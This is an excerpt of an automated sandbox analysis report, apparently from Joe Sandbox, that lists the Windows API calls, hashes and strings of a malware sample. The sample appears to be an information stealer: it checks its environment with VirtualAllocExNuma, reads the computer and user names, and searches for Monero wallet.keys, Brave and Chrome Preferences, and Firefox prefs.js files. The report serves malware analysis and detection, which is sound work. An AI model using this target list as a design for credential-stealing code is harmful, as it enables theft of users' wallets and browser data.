                                  • Instruction Fuzzy Hash: 490186B1A04208EBDB04DF94DD45BAEBFB8F744B65F10425AF945E3280D37859448BA6
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0053112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00531132
                                  • ExitProcess.KERNEL32 ref: 00531143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 68779da8ea338f576b5bba3b8e02745f78aac61ffc6610b66606db25de2b53d6
                                  • Instruction ID: 04701220fe59c6fc6af349783f36280caa4aab24f16184f7f5a767b738e30ece
                                  • Opcode Fuzzy Hash: 68779da8ea338f576b5bba3b8e02745f78aac61ffc6610b66606db25de2b53d6
                                  • Instruction Fuzzy Hash: 4AE0E670945308FBF7146BB09D0EB4D7B78AB44B42F104054F70D761D0D6B92651979E
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005310B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005310F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 2ff5e44a13d7da8dec36633a3b9387c24651d4bd867de47c004a7a80faa3aba0
                                  • Instruction ID: edd37dabcb5afd335c021fb468bc31f751ade9493802d2a4bfbffa8b1a066c2b
                                  • Opcode Fuzzy Hash: 2ff5e44a13d7da8dec36633a3b9387c24651d4bd867de47c004a7a80faa3aba0
                                  • Instruction Fuzzy Hash: 87F0E2B1641208BBE7189AB4AC4DFBEBBE8E705B55F304448F504E7280D5719F40CAA9
                                  APIs
                                    • Part of subcall function 005478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547910
                                    • Part of subcall function 005478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00547917
                                    • Part of subcall function 005478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0054792F
                                    • Part of subcall function 00547850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005311B7), ref: 00547880
                                    • Part of subcall function 00547850: RtlAllocateHeap.NTDLL(00000000), ref: 00547887
                                    • Part of subcall function 00547850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0054789F
                                  • ExitProcess.KERNEL32 ref: 005311C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: 2d627969e3d7e9c142820affb40597ca4c4381429b833d814d1c65b495942841
                                  • Instruction ID: f3cd6c70de3de9396e7399931cc1a1b825b06792a882919d2b5b484d2a27f977
                                  • Opcode Fuzzy Hash: 2d627969e3d7e9c142820affb40597ca4c4381429b833d814d1c65b495942841
                                  • Instruction Fuzzy Hash: C6E012B591430763DA0077B1AC0EBAE3B9C7B9478EF044824FA09D2502FA69E850C66E
                                  APIs
                                  • wsprintfA.USER32 ref: 005438CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 005438E3
                                  • lstrcat.KERNEL32(?,?), ref: 00543935
                                  • StrCmpCA.SHLWAPI(?,00550F70), ref: 00543947
                                  • StrCmpCA.SHLWAPI(?,00550F74), ref: 0054395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00543C67
                                  • FindClose.KERNEL32(000000FF), ref: 00543C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 7f68aa63316d2808875846c9586132bb9175aebed67b77b3802073a004178e59
                                  • Instruction ID: 14ddb23d818363e8ffd554825055e62df0cff1e566d9b291b1e430278c48f5aa
                                  • Opcode Fuzzy Hash: 7f68aa63316d2808875846c9586132bb9175aebed67b77b3802073a004178e59
                                  • Instruction Fuzzy Hash: 32A16471900219ABDB24DF64DC89FFE7778FF84305F048588A50D96151EB749B84CF62
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00550B32,00550B2B,00000000,?,?,?,005513F4,00550B2A), ref: 0053BEF5
                                  • StrCmpCA.SHLWAPI(?,005513F8), ref: 0053BF4D
                                  • StrCmpCA.SHLWAPI(?,005513FC), ref: 0053BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0053C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 8d521a4c88311b26d62527e9cf26482a3587f3c4825231d6c627df73e66eefbb
                                  • Instruction ID: d8056c2094389a93f518d84573967fb030d8b73b142e0169f96adaa5a14b237b
                                  • Opcode Fuzzy Hash: 8d521a4c88311b26d62527e9cf26482a3587f3c4825231d6c627df73e66eefbb
                                  • Instruction Fuzzy Hash: 12426772940105A7EB54FB70DC9AEED7B3DFFC4304F404558B90AA6181EE34AB49CB92
                                  APIs
                                  • wsprintfA.USER32 ref: 0054492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00544943
                                  • StrCmpCA.SHLWAPI(?,00550FDC), ref: 00544971
                                  • StrCmpCA.SHLWAPI(?,00550FE0), ref: 00544987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00544B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00544B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 909ee75cc1d7a4651b089085e61d0fa8e56fb543fa1f6a0c30f48d4e6478e677
                                  • Instruction ID: 207d6efde5fb77fdacbc9277c2af2d35a01ce14807286b7b25460c6708d6258a
                                  • Opcode Fuzzy Hash: 909ee75cc1d7a4651b089085e61d0fa8e56fb543fa1f6a0c30f48d4e6478e677
                                  • Instruction Fuzzy Hash: E66166B2900219ABDB24EBA0DC49FEE777CBB88705F048588B50D96141EB74AB85CF95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00544580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00544587
                                  • wsprintfA.USER32 ref: 005445A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 005445BD
                                  • StrCmpCA.SHLWAPI(?,00550FC4), ref: 005445EB
                                  • StrCmpCA.SHLWAPI(?,00550FC8), ref: 00544601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0054468B
                                  • FindClose.KERNEL32(000000FF), ref: 005446A0
                                  • lstrcat.KERNEL32(?,011FE798), ref: 005446C5
                                  • lstrcat.KERNEL32(?,011FDC80), ref: 005446D8
                                  • lstrlen.KERNEL32(?), ref: 005446E5
                                  • lstrlen.KERNEL32(?), ref: 005446F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 98791f69f551ef1c28ebf31d6a9a2672bac88b7dbf1f7d513a2e0c874898cc62
                                  • Instruction ID: 904f948eb8fd0a28c1295f048fa8869b2e5a13bacfb4b72c5dfc06c6a30732c6
                                  • Opcode Fuzzy Hash: 98791f69f551ef1c28ebf31d6a9a2672bac88b7dbf1f7d513a2e0c874898cc62
                                  • Instruction Fuzzy Hash: CF5166B2540218ABDB24EB70DC89FED777CBB94344F408588B61D92190EB749BC5CF96
                                  APIs
                                  • wsprintfA.USER32 ref: 00543EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00543EDA
                                  • StrCmpCA.SHLWAPI(?,00550FAC), ref: 00543F08
                                  • StrCmpCA.SHLWAPI(?,00550FB0), ref: 00543F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0054406C
                                  • FindClose.KERNEL32(000000FF), ref: 00544081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 1339739482f4af775f17538afff019b89d4db8f846227d9615ea7f5c0fe30f72
                                  • Instruction ID: 88d6c42450801a1c3c1bc780cd86fa140e683e9aa3ef7111375f9ef228a4a5d2
                                  • Opcode Fuzzy Hash: 1339739482f4af775f17538afff019b89d4db8f846227d9615ea7f5c0fe30f72
                                  • Instruction Fuzzy Hash: FF5146B2900219BBDB24FBB0DC49EEE777CBB84304F408588B65D96180DB759B89CF95
                                  APIs
                                  • wsprintfA.USER32 ref: 0053ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0053ED55
                                  • StrCmpCA.SHLWAPI(?,00551538), ref: 0053EDAB
                                  • StrCmpCA.SHLWAPI(?,0055153C), ref: 0053EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0053F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: fab8e78332d2d294d77535f738c2f8c433bc8e3a885a6fbc794396c1c482f6c5
                                  • Instruction ID: 336ad2defafaa74901e763baf879e06f2051cccf5f02388bfa5fccdc46201fd3
                                  • Opcode Fuzzy Hash: fab8e78332d2d294d77535f738c2f8c433bc8e3a885a6fbc794396c1c482f6c5
                                  • Instruction Fuzzy Hash: A5E10672951119AAFB94FB60DC56EEE7B38FF94304F404599B40A62092EF306F8ACF51
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005515B8,00550D96), ref: 0053F71E
                                  • StrCmpCA.SHLWAPI(?,005515BC), ref: 0053F76F
                                  • StrCmpCA.SHLWAPI(?,005515C0), ref: 0053F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0053FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c64a11dca7e1b79f23a2824ca660226d39261172bfc3a4edb3f5f56d66ce8e32
                                  • Instruction ID: d336c97d4bd175d344c8ef2b7ac02791341dbf926484d44cf7824ab23d4daddc
                                  • Opcode Fuzzy Hash: c64a11dca7e1b79f23a2824ca660226d39261172bfc3a4edb3f5f56d66ce8e32
                                  • Instruction Fuzzy Hash: ABB13371940109ABEB64FF60DC5AEEE7B79FFD4304F4085A8A40A96151EF306B49CF92
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0055510C,?,?,?,005551B4,?,?,00000000,?,00000000), ref: 00531923
                                  • StrCmpCA.SHLWAPI(?,0055525C), ref: 00531973
                                  • StrCmpCA.SHLWAPI(?,00555304), ref: 00531989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00531D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00531DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00531E20
                                  • FindClose.KERNEL32(000000FF), ref: 00531E32
